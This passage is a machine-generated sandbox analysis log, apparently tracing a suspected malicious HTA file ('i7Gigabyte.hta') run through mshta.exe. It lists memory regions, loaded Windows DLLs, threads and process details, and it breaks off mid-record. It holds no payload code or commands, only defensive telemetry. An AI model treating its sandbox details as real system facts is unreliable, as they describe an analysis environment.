entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db")
Region:
id = 904
start_va = 0x1c70000
end_va = 0x1c73fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 905
start_va = 0x1de0000
end_va = 0x1e45fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 906
start_va = 0x7fefdb20000
end_va = 0x7fefdc97fff
monitored = 0
entry_point = 0x7fefdb210e0
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 907
start_va = 0x7fefee00000
end_va = 0x7fefef29fff
monitored = 0
entry_point = 0x7fefee010d4
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 908
start_va = 0x7feff860000
end_va = 0x7feffab8fff
monitored = 0
entry_point = 0x7feff861340
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 910
start_va = 0x7fefd800000
end_va = 0x7fefd96cfff
monitored = 0
entry_point = 0x7fefd8010b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 911
start_va = 0x7fefd7f0000
end_va = 0x7fefd7fefff
monitored = 0
entry_point = 0x7fefd7f1020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 912
start_va = 0x1e50000
end_va = 0x1e50fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001e50000"
filename = ""
Region:
id = 935
start_va = 0x21b0000
end_va = 0x21befff
monitored = 0
entry_point = 0x21b2a8d
region_type = mapped_file
name = "mshta.exe"
filename = "\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")
Region:
id = 936
start_va = 0x21c0000
end_va = 0x21c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mshta.exe.mui"
filename = "\\Windows\\SysWOW64\\en-US\\mshta.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mshta.exe.mui")
Region:
id = 1694
start_va = 0x2510000
end_va = 0x258ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002510000"
filename = ""
Thread:
id = 22
os_tid = 0xe78
Thread:
id = 23
os_tid = 0xe74
Thread:
id = 24
os_tid = 0xe70
Thread:
id = 25
os_tid = 0xe6c
Thread:
id = 26
os_tid = 0xe68
Thread:
id = 27
os_tid = 0xe7c
Thread:
id = 29
os_tid = 0xe88
Process:
id = "4"
image_name = "mshta.exe"
filename = "c:\\windows\\syswow64\\mshta.exe"
page_root = "0x40eeb000"
os_pid = "0xe80"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "3"
os_parent_pid = "0xe64"
cmd_line = "\"C:\\Windows\\SysWOW64\\mshta.exe\" \"C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta\" "
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 918
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 919
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 920
start_va = 0x40000
end_va = 0x40fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 921
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 922
start_va = 0x60000
end_va = 0x60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 923
start_va = 0x210000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 924
start_va = 0x2a0000
end_va = 0x39ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002a0000"
filename = ""
Region:
id = 925
start_va = 0x480000
end_va = 0x48efff
monitored = 1
entry_point = 0x482a8d
region_type = mapped_file
name = "mshta.exe"
filename = "\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")
Region:
id = 926
start_va = 0x77800000
end_va = 0x779a8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 927
start_va = 0x779e0000
end_va = 0x77b5ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 928
start_va = 0x7efb0000
end_va = 0x7efd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 929
start_va = 0x7efdb000
end_va = 0x7efddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 930
start_va = 0x7efde000
end_va = 0x7efdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 931
start_va = 0x7efdf000
end_va = 0x7efdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 932
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 933
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 934
start_va = 0x7fff0000
end_va = 0x7fffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 938
start_va = 0x80000
end_va = 0xfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000080000"
filename = ""
Region:
id = 939
start_va = 0x75250000
end_va = 0x75257fff
monitored = 0
entry_point = 0x752520f8
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 940
start_va = 0x75260000
end_va = 0x752bbfff
monitored = 0
entry_point = 0x7529f9f4
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 941
start_va = 0x752c0000
end_va = 0x752fefff
monitored = 0
entry_point = 0x752ee088
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 942
start_va = 0x776e0000
end_va = 0x777fefff
monitored = 0
entry_point = 0x776f5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 943
start_va = 0x769b0000
end_va = 0x76abffff
monitored = 0
entry_point = 0x769c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 944
start_va = 0x776e0000
end_va = 0x777fefff
monitored = 0
entry_point = 0x776f5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 945
start_va = 0x776e0000
end_va = 0x777fefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000776e0000"
filename = ""
Region:
id = 946
start_va = 0x775e0000
end_va = 0x776d9fff
monitored = 0
entry_point = 0x775fa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 947
start_va = 0x775e0000
end_va = 0x776d9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000775e0000"
filename = ""
Region:
id = 948
start_va = 0x100000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 949
start_va = 0x769b0000
end_va = 0x76abffff
monitored = 0
entry_point = 0x769c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 950
start_va = 0x76fe0000
end_va = 0x77026fff
monitored = 0
entry_point = 0x76fe74c1
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 954
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 955
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 956
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 958
start_va = 0x3a0000
end_va = 0x406fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 959
start_va = 0x76c20000
end_va = 0x76cbffff
monitored = 0
entry_point = 0x76c349e5
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 960
start_va = 0x76cc0000
end_va = 0x76d6bfff
monitored = 0
entry_point = 0x76cca472
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 961
start_va = 0x76900000
end_va = 0x76918fff
monitored = 0
entry_point = 0x76904975
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 962
start_va = 0x75bc0000
end_va = 0x75caffff
monitored = 0
entry_point = 0x75bd0569
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 963
start_va = 0x75530000
end_va = 0x7558ffff
monitored = 0
entry_point = 0x7554a3b3
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 964
start_va = 0x75520000
end_va = 0x7552bfff
monitored = 0
entry_point = 0x755210e1
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 965
start_va = 0x490000
end_va = 0x5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000490000"
filename = ""
Region:
id = 966
start_va = 0x20000
end_va = 0x3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 967
start_va = 0x73870000
end_va = 0x73e26fff
monitored = 1
entry_point = 0x7387bffb
region_type = mapped_file
name = "mshtml.dll"
filename = "\\Windows\\SysWOW64\\mshtml.dll" (normalized: "c:\\windows\\syswow64\\mshtml.dll")
Region:
id = 968
start_va = 0x779b0000
end_va = 0x779b4fff
monitored = 0
entry_point = 0x779b1438
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")
Region:
id = 969
start_va = 0x77240000
end_va = 0x772cffff
monitored = 0
entry_point = 0x77256343
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 970
start_va = 0x773b0000
end_va = 0x774affff
monitored = 0
entry_point = 0x773cb6ed
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 971
start_va = 0x75780000
end_va = 0x75789fff
monitored = 0
entry_point = 0x757836a0
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 972
start_va = 0x76ac0000
end_va = 0x76b5cfff
monitored = 0
entry_point = 0x76af3fd7
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 973
start_va = 0x76e80000
end_va = 0x76fdbfff
monitored = 0
entry_point = 0x76ecba3d
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 974
start_va = 0x75a80000
end_va = 0x75bb5fff
monitored = 0
entry_point = 0x75a81b35
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll")
Region:
id = 975
start_va = 0x76d80000
end_va = 0x76e74fff
monitored = 0
entry_point = 0x76d81865
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll")
Region:
id = 976
start_va = 0x771d0000
end_va = 0x77226fff
monitored = 0
entry_point = 0x771e9ba6
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 977
start_va = 0x75880000
end_va = 0x75a7afff
monitored = 0
entry_point = 0x758822d9
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll")
Region:
id = 978
start_va = 0x757f0000
end_va = 0x7587efff
monitored = 0
entry_point = 0x757f3fb1
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 979
start_va = 0x75650000
end_va = 0x75770fff
monitored = 0
entry_point = 0x7565158e
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")
Region:
id = 980
start_va = 0x76d70000
end_va = 0x76d7bfff
monitored = 0
entry_point = 0x76d7238e
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")
Region:
id = 981
start_va = 0x73840000
end_va = 0x73869fff
monitored = 0
entry_point = 0x738410ed
region_type = mapped_file
name = "msls31.dll"
filename = "\\Windows\\SysWOW64\\msls31.dll" (normalized: "c:\\windows\\syswow64\\msls31.dll")
Region:
id = 982
start_va = 0x74520000
end_va = 0x74528fff
monitored = 0
entry_point = 0x74521220
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 983
start_va = 0x250000
end_va = 0x26dfff
monitored = 0
entry_point = 0x26158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 984
start_va = 0x600000
end_va = 0x787fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000600000"
filename = ""
Region:
id = 985
start_va = 0x250000
end_va = 0x26dfff
monitored = 0
entry_point = 0x26158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 986
start_va = 0x76b90000
end_va = 0x76beffff
monitored = 0
entry_point = 0x76ba158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 987
start_va = 0x774b0000
end_va = 0x7757bfff
monitored = 0
entry_point = 0x774b168b
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 988
start_va = 0x790000
end_va = 0x910fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000790000"
filename = ""
Region:
id = 989
start_va = 0x920000
end_va = 0x1d1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000920000"
filename = ""
Region:
id = 990
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mshta.exe.mui"
filename = "\\Windows\\SysWOW64\\en-US\\mshta.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mshta.exe.mui")
Region:
id = 991
start_va = 0x30000
end_va = 0x3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 992
start_va = 0x70000
end_va = 0x70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 993
start_va = 0x100000
end_va = 0x100fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 994
start_va = 0x110000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 995
start_va = 0x250000
end_va = 0x250fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000250000"
filename = ""
Region:
id = 996
start_va = 0x420000
end_va = 0x45ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000420000"
filename = ""
Region:
id = 997
start_va = 0x1e90000
end_va = 0x1f8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e90000"
filename = ""
Region:
id = 998
start_va = 0x7efd8000
end_va = 0x7efdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 999
start_va = 0x260000
end_va = 0x260fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000260000"
filename = ""
Region:
id = 1000
start_va = 0x74460000
end_va = 0x744dffff
monitored = 0
entry_point = 0x744737c9
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 1001
start_va = 0x490000
end_va = 0x51ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000490000"
filename = ""
Region:
id = 1002
start_va = 0x5f0000
end_va = 0x5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005f0000"
filename = ""
Region:
id = 1003
start_va = 0x1d20000
end_va = 0x1dfefff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001d20000"
filename = ""
Region:
id = 1004
start_va = 0x74410000
end_va = 0x74422fff
monitored = 0
entry_point = 0x74411d3f
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")
Region:
id = 1005
start_va = 0x1f90000
end_va = 0x225efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1006
start_va = 0x270000
end_va = 0x270fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000270000"
filename = ""
Region:
id = 1007
start_va = 0x77320000
end_va = 0x773a2fff
monitored = 0
entry_point = 0x773223d2
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 1008
start_va = 0x280000
end_va = 0x280fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000280000"
filename = ""
Region:
id = 1009
start_va = 0x290000
end_va = 0x290fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 1010
start_va = 0x410000
end_va = 0x411fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000410000"
filename = ""
Region:
id = 1011
start_va = 0x745f0000
end_va = 0x7478dfff
monitored = 0
entry_point = 0x7461e6b5
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 1012
start_va = 0x290000
end_va = 0x290fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 1013
start_va = 0x460000
end_va = 0x461fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000460000"
filename = ""
Region:
id = 1014
start_va = 0x290000
end_va = 0x290fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000290000"
filename = ""
Region:
id = 1015
start_va = 0x75cb0000
end_va = 0x768f9fff
monitored = 0
entry_point = 0x75d31601
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 1016
start_va = 0x470000
end_va = 0x470fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 1017
start_va = 0x490000
end_va = 0x4affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000490000"
filename = ""
Region:
id = 1018
start_va = 0x4e0000
end_va = 0x51ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 1019
start_va = 0x2260000
end_va = 0x229ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002260000"
filename = ""
Region:
id = 1020
start_va = 0x23e0000
end_va = 0x24dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023e0000"
filename = ""
Region:
id = 1021
start_va = 0x7efd5000
end_va = 0x7efd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd5000"
filename = ""
Region:
id = 1022
start_va = 0x72df0000
end_va = 0x72dfafff
monitored = 0
entry_point = 0x72df12c6
region_type = mapped_file
name = "msimtf.dll"
filename = "\\Windows\\SysWOW64\\msimtf.dll" (normalized: "c:\\windows\\syswow64\\msimtf.dll")
Region:
id = 1023
start_va = 0x520000
end_va = 0x59ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000520000"
filename = ""
Region:
id = 1024
start_va = 0x74790000
end_va = 0x747cbfff
monitored = 0
entry_point = 0x74793089
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll")
Region:
id = 1025
start_va = 0x4b0000
end_va = 0x4b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll")
Region:
id = 1026
start_va = 0x1e00000
end_va = 0x1e3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e00000"
filename = ""
Region:
id = 1027
start_va = 0x2590000
end_va = 0x268ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002590000"
filename = ""
Region:
id = 1028
start_va = 0x742b0000
end_va = 0x742c6fff
monitored = 0
entry_point = 0x742b3573
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")
Region:
id = 1029
start_va = 0x7efad000
end_va = 0x7efaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efad000"
filename = ""
Region:
id = 1030
start_va = 0x5a0000
end_va = 0x5dbfff
monitored = 0
entry_point = 0x5a128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1031
start_va = 0x5a0000
end_va = 0x5dbfff
monitored = 0
entry_point = 0x5a128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1032
start_va = 0x5a0000
end_va = 0x5dbfff
monitored = 0
entry_point = 0x5a128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1033
start_va = 0x5a0000
end_va = 0x5dbfff
monitored = 0
entry_point = 0x5a128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1034
start_va = 0x5a0000
end_va = 0x5dbfff
monitored = 0
entry_point = 0x5a128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1035
start_va = 0x74270000
end_va = 0x742aafff
monitored = 0
entry_point = 0x7427128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1036
start_va = 0x74430000
end_va = 0x7443dfff
monitored = 0
entry_point = 0x74431235
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll")
Region:
id = 1037
start_va = 0x2380000
end_va = 0x23bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002380000"
filename = ""
Region:
id = 1038
start_va = 0x26f0000
end_va = 0x27effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000026f0000"
filename = ""
Region:
id = 1039
start_va = 0x2830000
end_va = 0x286ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 1040
start_va = 0x28b0000
end_va = 0x29affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000028b0000"
filename = ""
Region:
id = 1041
start_va = 0x7efa7000
end_va = 0x7efa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa7000"
filename = ""
Region:
id = 1042
start_va = 0x7efaa000
end_va = 0x7efacfff
monitored = 1
entry_point = 0x0
region_type = private
